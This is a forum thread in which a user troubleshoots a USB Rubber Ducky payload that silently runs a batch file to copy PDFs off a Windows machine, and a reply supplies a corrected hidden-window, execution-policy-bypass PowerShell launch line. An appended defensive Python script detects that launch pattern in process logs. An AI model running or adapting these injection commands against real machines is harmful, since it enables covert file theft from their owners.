grahamjohnson77

Powershell Find Drive by Label Not Working

All,

I have started to learn the Rubber Ducky and followed the vlog on exfiltration of files from a system using the Ducky. I built everything and all components are working except the initial drive find in PowerShell. Learning from the vlog: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - Love these guys (shout out from Italy via Ireland!)

For testing only (while I get more experience with the Ducky), I have an external USB drive that I am using (e.g. F:\). That contains all the required files: d.bat, e.bat and the cscript i.vbs. Files are copied to the slurp folder there. Then I plug in my Rubber Ducky to start the attack. That Ducky script looks for the drive with label "PD" (which is F:\) for the required d.bat to start the attack.

From my testing/debugging, I know that if I run the PowerShell command directly in a PowerShell CLI, the attack works with no issues. Also, I can hard-code the drive letter F:\ and again, no issues. My slurp folder has the extracted PDF files. The only thing I can think it could be is that the system locale is Italian with an Italian keyboard. But I am compiling it with the ITALIAN encoder and it works in other ways.


REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "$u=gwmi win32_volume -Filter Label="`"PD"`";cd $u.Name;.\d.cmd"

REM This one is working directly from Run -> Start!!!
REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "F:\d.cmd"
REM This one is working directly from Run -> Start!!! But Not Ducky!
REM STRING powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'PD'}|select name;cd $u.name;.\d.cmd"

REM This one is working but I don't want to hard code it obviously! Just to try and confirm is working as expected!
REM STRING powershell -NoP -NonI -W H -Exec Bypass "e:\d.cmd"

REM My latest attempt! Still no luck!
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"
ENTER

I did see some errors about the select from win32_volume not being valid etc. last night during troubleshooting, so I think I would be seeing some PowerShell error if the string format were incorrect etc.

Any ideas of how to troubleshoot this line only from the Rubber Ducky payload when Ducky is running? (again, I can put it into PowerShell directly and works!)

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"

Thank you.


Try this:

powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;"

You passed the name already. No need to reference it in the variable. Surprised it even works in your stand-alone tests unless you are already in the folder with the d.cmd file.

Also, to remove the extra (") that might be terminating the string you can use "{}" for the filter statement in powershell.


Edited by PoSHMagiC0de
Forgot the C parameter.
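The launch pattern discussed in this thread, seen from the monitoring side, as an added example that is not part of the thread or of any Hak5 material: a small Python triage routine that scores process-creation log lines for the indicators visible in the posted command lines (no profile, non-interactive, hidden window, execution-policy bypass, a WMI volume lookup by label, and a launch from explorer.exe as the Run dialog would produce). The log line format, host names, paths, weights and threshold are assumptions made for this example, and the sample events are constructed.

```python
"""Triage constructed process-creation events for hidden, policy-bypassing
PowerShell launches that enumerate volumes by label.

Added example for this thread; the log format, weights and sample data are
assumptions, not real telemetry.
"""
import re

# Each indicator: (name, regex matched against the command line, weight).
# Patterns accept the abbreviated switch forms seen in the thread (-NoP,
# -NonI, -W Hidden, -Exec Bypass) as well as the long forms.
INDICATORS = [
    ("no_profile",          r"-nop\w*",                     1),
    ("non_interactive",     r"-noni\w*",                    1),
    ("hidden_window",       r"-w\w*\s+h(?:idden)?\b",       2),
    ("exec_policy_bypass",  r"-e(?:x\w*|p)\s+bypass\b",     2),
    ("wmi_volume_by_label", r"win32_volume\b.*\blabel\b",   2),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), weight)
            for name, pat, weight in INDICATORS]

# Assumed alert threshold: a single hidden-window or bypass switch alone is
# common in admin scripts; the combination seen in the payload is not.
ALERT_THRESHOLD = 5

# Assumed log line layout (hypothetical, key=value fields, command last).
EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+parent=(?P<parent>\S+)"
    r"\s+image=(?P<image>\S+)\s+cmd=(?P<cmd>.*)$"
)

PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events: the first mirrors the command line from the
# thread launched via the Run dialog (parent explorer.exe); the rest are
# ordinary administrative uses that should stay below the threshold.
SAMPLE_EVENTS = [
    "2024-05-01T09:12:03Z host=WS01 parent=C:\\Windows\\explorer.exe image="
    + PS_IMAGE + " cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -C "
    "\"$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\\d.cmd;\"",
    "2024-05-01T09:20:45Z host=WS02 parent=C:\\Windows\\System32\\svchost.exe image="
    + PS_IMAGE + " cmd=powershell.exe -NoProfile -ExecutionPolicy RemoteSigned "
    "-File C:\\scripts\\backup.ps1",
    "2024-05-01T09:25:10Z host=WS03 parent=C:\\Windows\\System32\\svchost.exe image="
    + PS_IMAGE + " cmd=powershell.exe -File C:\\ProgramData\\inventory.ps1",
    "2024-05-01T09:30:11Z host=WS04 parent=C:\\Windows\\System32\\cmd.exe image="
    + PS_IMAGE + " cmd=powershell.exe -w hidden -c \"Get-Date\"",
]


def parse_event(line):
    """Split one log line into its fields; return None if it does not fit."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def score_command_line(cmd, parent=""):
    """Return (score, [indicator names]) for a PowerShell command line.

    A hidden window launched from the interactive shell (explorer.exe) gets
    one extra point: that is how keystroke-injection via the Run dialog
    shows up, whereas scheduled or service-started scripts do not.
    """
    hits = [name for name, rx, _ in COMPILED if rx.search(cmd)]
    score = sum(weight for name, _, weight in COMPILED if name in hits)
    if "hidden_window" in hits and parent.lower().endswith("explorer.exe"):
        hits.append("hidden_window_from_interactive_shell")
        score += 1
    return score, hits


def triage(lines):
    """Parse and score every line; return alert records at or above threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or not ev["image"].lower().endswith("powershell.exe"):
            continue
        score, hits = score_command_line(ev["cmd"], ev["parent"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "score": score,
                           "indicators": hits, "cmd": ev["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['host']} score={alert['score']} "
              f"indicators={','.join(alert['indicators'])}")
        print(f"  cmd: {alert['cmd']}")
```

The scoring is deliberately additive rather than a single regex, so a backup script that happens to use `-NoProfile` (sample two) or a one-off `-w hidden` (sample four) stays below the threshold, while the combination from the thread scores well above it. In a real pipeline the same function would be fed the CommandLine and ParentImage fields of Sysmon event 1 or Security event 4688 with command-line auditing enabled.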
